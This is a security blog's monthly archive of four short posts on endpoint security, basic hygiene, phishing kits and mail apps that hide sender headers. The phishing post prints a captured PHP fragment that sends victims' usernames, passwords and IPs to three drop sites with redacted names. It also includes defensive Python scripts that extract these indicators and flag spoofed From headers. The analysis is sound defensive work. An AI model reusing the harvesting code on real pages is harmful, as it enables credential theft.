Monthly Archives: October 2015

The Rebirth of Endpoint Security

24 October 2015

Last Wednesday I listened to an interesting story on Information Week Dark Reading Radio. The half-hour show, titled Endpoint Security Transformed, is worth listening to. In her excellent post on the same subject, Kelly Jackson Higgins, the host of the show, gives a great introduction to this emerging technology and market.

Endpoint protection has been neglected for many years; the focus was on detection. But the major attacks of the past few years show that once an attacker has gained access to the network, detection alone is not enough, because insider threats are hard to detect.

This quotation from Paul Calatayud, CISO of Surescripts, sums it up:

Endpoints are getting compromised, and their credentials get stolen. Then they become an insider threat.

Another statement from the show is remarkable:

Most of the attacks exploit vulnerabilities which were already known, sometimes for more than a year.

This statement makes clear that we need entirely new provisioning and patching concepts, or sophisticated whitelisting methods, to lock down end-user systems. Applying just the Flash Player patches alone to thousands of computers is a nightmare, and extremely expensive.

Enjoy the show… and have a good weekend.

Cyber security innovation is crucial

17 October 2015

I had some unpleasant discussions this week about the importance of basic security. In my opinion most companies could raise their level of security by about 50 to 60 percent just by getting the basics right. The best Advanced Threat Protection (ATP) technology is useless once the attacker is on your network. Then what matters is hindering the attacker from searching the network for the credentials of the domain administrators.

Warwick Ashford’s post ‘Cyber security innovation is crucial, says security evangelist’, published on Tuesday on ComputerWeekly.com, made my day:

“Basic cyber hygiene is typically lacking, and just by getting the basics up to scratch companies could reduce 90% of their cyber risk”

This report gives you great arguments for adjusting budgets in favor of the basics. I hope you enjoy reading it.

Have a good weekend.

STOP.THINK.CONNECT

11 October 2015

The past week was full of exciting discoveries. I received some really well-crafted phishing emails. They used the same bizarre landing page design but showed a somewhat different method of POST processing. Since one of the landing sites was open to everyone, I had the chance to make a copy of the POST-processing PHP procedure:

…
// One record per victim. $user, $pass, $ip, $browser and $hostname are
// presumably populated earlier in the script (elided above).
$data = "#$user#$pass#:#$ip#$browser#$hostname";
// Three drop sites that each receive every captured credential (domains redacted).
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
function writeit($data,$site) {
    global $textHos;   // declared but never used in this fragment
    // The whole record travels in a single form field named "info"
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context  = stream_context_create($options);
    // Server-side POST: the victim's browser never contacts the drop sites
    $result = file_get_contents($site, false, $context);
}
// Fan the record out to every drop site
foreach ($sites as $site) {
    writeit($data,$site);
}

Most of the phishing sites I analyzed in the past months send an email message with the username and password to the bad guys. In this case the username and password are forwarded to three sites for further processing.
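When a kit like the one above falls into your hands, the first question is where the credentials go, so that the drop sites and mailbox can be blocked and reported. The following is an added example, not code from this post and not part of the kit: a small static triage helper in Python that never executes the PHP but pattern-matches the two exfiltration styles described above, a mail() call and POST-forwarding to a list of drop sites. SAMPLE_KIT is constructed for this example: the forwarding fragment from the post (redacted XXXXX domains kept), wrapped in an invented mail() call, an invented redirect and invented field names.

```python
"""Static triage of a captured phishing-kit PHP file: report where the credentials go."""
import re
from urllib.parse import urlparse

# Constructed sample kit: the post's forwarding code plus invented mail()/redirect lines.
SAMPLE_KIT = r'''<?php
$user = $_POST['username'];
$pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = "#$user#$pass#:#$ip#$browser#$hostname";
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
function writeit($data,$site) {
    $options = array('http' => array(
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query(array('info' => $data)),
    ));
    $result = file_get_contents($site, false, stream_context_create($options));
}
foreach ($sites as $site) { writeit($data,$site); }
mail("drop.box.example@example.net", "New login", $data);   // invented mail() variant
header("Location: https://www.example.com/login");            // invented redirect
?>'''

URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.I)
LOCATION_RE = re.compile(r'Location:\s*(https?://[^\s"\'<>)]+)', re.I)
EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')
MAIL_CALL_RE = re.compile(r'\bmail\s*\(')
FIELD_RE = re.compile(r'\$_(?:POST|GET|REQUEST)\[\s*[\'"]([^\'"]+)[\'"]\s*\]')
# Functions a kit uses to talk to drop sites from the server side
FORWARD_FUNCS = ("stream_context_create", "curl_exec", "fsockopen")


def extract_iocs(php_source):
    """Return drop sites, exfil addresses, redirect targets and harvested fields."""
    redirects = set(LOCATION_RE.findall(php_source))
    # Every URL that is not a redirect target is somewhere the stolen data is sent.
    drop_sites = sorted(set(URL_RE.findall(php_source)) - redirects)
    uses_mail = MAIL_CALL_RE.search(php_source) is not None
    return {
        "drop_sites": drop_sites,
        # urlparse().hostname lowercases, which is what a blocklist entry wants
        "drop_hosts": sorted({urlparse(u).hostname for u in drop_sites}),
        # Only count addresses as exfil targets when the kit actually calls mail()
        "exfil_emails": sorted(set(EMAIL_RE.findall(php_source))) if uses_mail else [],
        "redirect_targets": sorted(redirects),
        "harvested_fields": sorted(set(FIELD_RE.findall(php_source))),
        "uses_mail": uses_mail,
        "uses_post_forwarding": any(f in php_source for f in FORWARD_FUNCS),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_KIT).items():
        print(f"{key}: {value}")
```

This is triage, not proof: a kit that assembles its drop URL from pieces, base64-decodes it, or hides it behind eval() will not match these patterns, and the redirect target is usually the legitimate site the victim is bounced to, so it is reported separately rather than as a drop site.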

I checked the phishing landing pages with VirusTotal.com but found that in most cases the sites were not rated malicious. Even after 5 days only 10 of 65 scanners classified the pages as malicious or as phishing sites.

What surprised me was that most of the pages were listed in blacklist databases. Check the landing page from a phishing mail with, for example, IP INDETAIL. It’s very likely that the site is already listed on a blacklist.

And it’s really remarkable that browsers do not check these blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant; unfortunately, no one seems interested in turning it into actionable knowledge.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the Anti-Phishing Working Group (APWG) and the National Cyber Security Alliance (NCSA). The campaign’s slogan is Keeping the web a safer place for everyone. The campaign provides lots of information about two-factor authentication and tips for safe use of the internet. Take a look at the funny video clips.

Take care, and have a good week.

Mail apps facilitate phishing attacks

2 October 2015

Yesterday I received a really well-crafted phishing mail:

[Image: Phishing mail viewed in the Windows Phone Mail app]

When viewed with mail apps on smartphones or tablets, these well-made phishing mails look like the real thing.

Viewed with MS Outlook or a web mail client, the sender information in the header makes it crystal clear that this email is a phishing attempt:

[Image: Phishing mail viewed in Outlook]

In my opinion most phishing attacks would be easy to detect if email apps offered the option to display at least the full From header of the email.

It’s hard to understand why Google, Apple and Microsoft make their customers’ lives more difficult than necessary.
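What the phone app hides is exactly what a desktop client or a few lines of code reveal: the From header carries a display name and a real address, and the two need not agree. The following is an added example, not code from this post or from any mail client: it parses a raw message with Python’s standard library, separates the display name from the address, and flags the mismatches that give such a mail away. Both messages are constructed; the bank name, the addresses and all domains are invented stand-ins, and KNOWN_BRANDS is a hypothetical table you would fill from your own list of brands and partners.

```python
"""Separate the From display name from the real address and flag spoofing signs."""
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Constructed phishing message: the display name claims a bank, the address does not.
PHISH_MAIL = b"""\
From: "Example Bank Online Services" <security-update@mail-example-notice.biz>
Reply-To: verify@secure-reply-example.net
To: victim@example.org
Subject: Your account has been limited
Date: Thu, 1 Oct 2015 09:12:00 +0200
Content-Type: text/plain; charset=utf-8

Please confirm your details at http://XXXXXX0.biz/login/
"""

# Constructed legitimate message for comparison.
LEGIT_MAIL = b"""\
From: "Example Bank" <alerts@mail.examplebank.com>
To: victim@example.org
Subject: Your monthly statement is ready
Date: Thu, 1 Oct 2015 09:12:00 +0200
Content-Type: text/plain; charset=utf-8

Your statement is available in online banking.
"""

# Hypothetical brand table: brands you expect mail from and the domains they
# legitimately send from. Maintain it from your own partner/vendor list.
KNOWN_BRANDS = {
    "example bank": {"examplebank.com", "mail.examplebank.com"},
}


def mail_domain(address):
    """Domain part of an address, lowercased (no public-suffix handling)."""
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def inspect_from(raw_message):
    """Return display name, real address, Reply-To address and a list of findings."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    display, addr = parseaddr(str(msg.get("From", "")))
    _, reply_to = parseaddr(str(msg.get("Reply-To", "")))
    from_domain = mail_domain(addr)
    findings = []

    # 1. Display name borrows a known brand, but the address is not that brand's.
    for brand, domains in KNOWN_BRANDS.items():
        if brand in display.lower() and from_domain not in domains:
            findings.append(
                f"display name claims '{brand}' but the address domain is {from_domain}")

    # 2. Display name itself looks like an address, which is all the app shows.
    if "@" in display:
        findings.append("display name contains an address of its own")

    # 3. Replies would go to a different domain than the one that sent the mail.
    if reply_to and mail_domain(reply_to) != from_domain:
        findings.append(
            f"Reply-To domain {mail_domain(reply_to)} differs from From domain {from_domain}")

    return {
        "display_name": display,
        "address": addr,
        "reply_to": reply_to,
        "findings": findings,
    }


if __name__ == "__main__":
    for name, raw in (("phish", PHISH_MAIL), ("legit", LEGIT_MAIL)):
        result = inspect_from(raw)
        print(f"{name}: {result['display_name']!r} <{result['address']}>")
        for finding in result["findings"]:
            print("  -", finding)
```

The display-name check is deliberately crude: it catches the common case where the name spells out a brand the address has nothing to do with, but a lookalike domain such as examplebank-secure.com would only be caught by a brand table or a domain-similarity check, and none of this replaces SPF, DKIM and DMARC results from the receiving server.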

Have a good weekend!